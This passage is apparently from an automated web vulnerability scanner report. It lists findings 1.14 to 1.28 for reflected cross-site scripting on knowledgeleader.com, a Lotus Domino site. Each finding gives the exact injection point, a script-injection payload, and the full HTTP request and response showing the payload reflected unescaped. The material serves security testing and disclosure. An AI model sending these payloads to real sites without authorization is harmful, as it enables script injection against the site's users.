Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:40:53 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13133
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:06:08 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&Login&header?ad6d8"><script>alert(1)</script>0caa93b4774=1&Login">
...[SNIP]...

1.14. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1362f"><script>alert(1)</script>08e5da1cb13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader1362f"><script>alert(1)</script>08e5da1cb13/Content.nsf/Web+Content/Home+Page!OpenDocument&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:42:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13124
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader1362f"><script>alert(1)</script>08e5da1cb13/Content.nsf/Web+Content/Home+Page!OpenDocument&header&Login">
...[SNIP]...

1.15. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc8b9"><script>alert(1)</script>938dd73ebd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Contentdc8b9"><script>alert(1)</script>938dd73ebd7/Home+Page!OpenDocument&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:42:05 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13184
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Contentdc8b9"><script>alert(1)</script>938dd73ebd7/Home+Page!OpenDocument&header&Login">
...[SNIP]...

1.16. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b64c"><script>alert(1)</script>eea79bf48ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument9b64c"><script>alert(1)</script>eea79bf48ac&header HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:42:07 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13124
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument9b64c"><script>alert(1)</script>eea79bf48ac&header&Login">
...[SNIP]...

1.17. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8db"><script>alert(1)</script>46b3bde8701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header?bc8db"><script>alert(1)</script>46b3bde8701=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Registration.nsf/Registration!OpenForm&AccountType=Trial
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:42:00 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13127
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:07:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header?bc8db"><script>alert(1)</script>46b3bde8701=1&Login">
...[SNIP]...

1.18. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c371"><script>alert(1)</script>740548a343d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader1c371"><script>alert(1)</script>740548a343d/Content.nsf/Web+Content/KLplus!OpenDocument HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:16 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13114
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader1c371"><script>alert(1)</script>740548a343d/Content.nsf/Web+Content/KLplus!OpenDocument&Login">
...[SNIP]...

1.19. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9180"><script>alert(1)</script>cd7204b0bb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Contente9180"><script>alert(1)</script>cd7204b0bb1/KLplus!OpenDocument HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:17 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13164
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Contente9180"><script>alert(1)</script>cd7204b0bb1/KLplus!OpenDocument&Login">
...[SNIP]...

1.20. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c83b"><script>alert(1)</script>cd3d104b129 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument5c83b"><script>alert(1)</script>cd3d104b129 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13114
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument5c83b"><script>alert(1)</script>cd3d104b129&Login">
...[SNIP]...

1.21. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6abe"><script>alert(1)</script>cef19981538 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument?f6abe"><script>alert(1)</script>cef19981538=1 HTTP/1.1
Host: www.knowledgeleader.com
Proxy-Connection: keep-alive
Referer: http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Content/Home+Page!OpenDocument&header
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:47:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13117
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:12:28 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Content/KLplus!OpenDocument?f6abe"><script>alert(1)</script>cef19981538=1&Login">
...[SNIP]...

1.22. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75f1"><script>alert(1)</script>96932d8eda2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd75f1"><script>alert(1)</script>96932d8eda2/Content.nsf/Web+Landing+Page+KLplus HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:12 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13106
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:28 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderd75f1"><script>alert(1)</script>96932d8eda2/Content.nsf/Web+Landing+Page+KLplus&Login">
...[SNIP]...

1.23. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c5f"><script>alert(1)</script>54995bc4214 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplusf5c5f"><script>alert(1)</script>54995bc4214 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:14 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13106
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplusf5c5f"><script>alert(1)</script>54995bc4214&Login">
...[SNIP]...

1.24. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c95f"><script>alert(1)</script>b7b95f7cf58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus?6c95f"><script>alert(1)</script>b7b95f7cf58=1 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:09 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13109
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus?6c95f"><script>alert(1)</script>b7b95f7cf58=1&Login">
...[SNIP]...

1.25. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d82ba"><script>alert(1)</script>96de55712ca was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeaderd82ba"><script>alert(1)</script>96de55712ca/Content.nsf/Web+Landing+Page+KLplus+Title HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13112
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeaderd82ba"><script>alert(1)</script>96de55712ca/Content.nsf/Web+Landing+Page+KLplus+Title&Login">
...[SNIP]...

1.26. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15f6"><script>alert(1)</script>a0b0c2aa512 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Titlef15f6"><script>alert(1)</script>a0b0c2aa512 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:15 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13112
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:31 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Titlef15f6"><script>alert(1)</script>a0b0c2aa512&Login">
...[SNIP]...

1.27. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 387d0"><script>alert(1)</script>fd0e73a6507 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title?387d0"><script>alert(1)</script>fd0e73a6507=1 HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:10 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13115
Cache-control: no-cache
Set-Cookie: BIGipServerknowledgeleader.com_pool=719386122.20480.0000; expires=Thu, 28-Apr-2011 14:19:25 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="shortcut icon" href="/icons/KnowledgeLeader/Images/KL_Icon.ico">
<link rel="stylesheet" type="text/css" media="
...[SNIP]...
<a href="/KnowledgeLeader/Content.nsf/Web+Landing+Page+KLplus+Title?387d0"><script>alert(1)</script>fd0e73a6507=1&Login">
...[SNIP]...

1.28. http://www.knowledgeleader.com/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.knowledgeleader.com
Path:	/KnowledgeLeader/Content.nsf/Web+Landing+Page+Topics

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ead7"><script>alert(1)</script>189951f7243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KnowledgeLeader6ead7"><script>alert(1)</script>189951f7243/Content.nsf/Web+Landing+Page+Topics HTTP/1.1
Host: www.knowledgeleader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 28 Apr 2011 13:54:12 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 13106
Cache-control: no-cache
